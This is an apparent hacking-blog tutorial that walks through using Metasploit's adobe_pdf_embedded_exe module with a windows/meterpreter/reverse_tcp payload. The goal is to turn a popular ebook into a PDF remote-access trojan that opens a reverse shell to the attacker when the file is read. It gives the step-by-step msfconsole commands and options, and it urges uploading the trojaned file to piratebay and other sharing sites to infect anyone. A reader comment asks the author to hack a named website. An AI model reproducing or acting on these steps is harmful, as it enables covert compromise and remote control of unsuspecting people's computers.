Tutorials | Challenges | Tools | Downloads | Resources | Documentaries


In this post, we'll take a look at how hackers gain access to their target by using a PDF as RAT.

A hacker's objective is to find an ebook that is popular, then inject in with a reverse TCP connection (or another preference) . Once their target opens the ebook, although the target can read it as normal and with no issues, the hacker  will have established a reverse TCP connection to their system.

The victim has now been hacked.

Let's go through how that is done.

First, let's get prepared on our Kali Linux System.
I like to start the service postgresql and open msfconsole, with one command:

sudo service postgresql start && sudo msfconsole

If this isn't necessary for you, just open msfconsole.
[Image: 1.png]

Now that's done, let's search for the PDF exploit that we are going to use. As you can see in the screenshot, I've added some filters to my search query that will narrow down the results

[Image: 2.png]

Once that's done, we need to find:

copy the full name, then tell msfconsole that we want to use it:

use  exploit/windows/fileformat/adobe_pdf_embedded_exe

Now msfconsole should look like this.

[Image: 3.png]

Additionally, you can type info to find out more about this particular exploit.
 It's always worth doing this. It will provide useful links to sites that, if you're stuck, may help you.

[Image: 4.png]

Our second step is to set the payload that we are going to use. Let's make out RAT work on a Windows system by setting the following payload:

set PAYLOAD windows/meterpreter/reverse_tcp

[Image: 5.png]

If you would like the RAT to work on other systems, such as Android, type show payloads, then use the corresponding payload.

The next step is check what information this exploit require us to provide.
There are only 3.

EXITFUNC - change how the payload behaves (leave as it is)
LHOST- the ip address of the hacker (us)
LPORT-the used by the hacker (us)
FILENAME  what we want to name our new PDF RAT
INFILENAME the PDF that we are injecting

[Image: 6.png]

Now we need to set each option. You can also decided to add the payload at this  phase if you prefer. If you re-type it, it's doesn't matter.

[Image: 7.png]

Type run, then the PDF RAT will be created.
You will be informed about where it has been saved.
In the below image, you can see that mine was saved in:

However, I gonna move it to a more suitable place, which in in the same folder as the original clean PDF (sup.pdf)

To do that, I visit the folder that contains the RAT (m8.pdf) right click inside the folder, open terminal, type ls to see the contents, then type cp to copy it to my preferred location:
cp <file name> /home/shellcartel/Desktop/

Now we could send this to our target, or if our target is anyone, we could upload to sites like piratebay and other sharing sites.

Post a Comment

Can you hack assignmenthelp4medotcom How much time it will take to you.



{twitter https://twitter.com/ghhackers}

Contact Form


Email *

Message *

Powered by Blogger.
Javascript DisablePlease Enable Javascript To See All Widget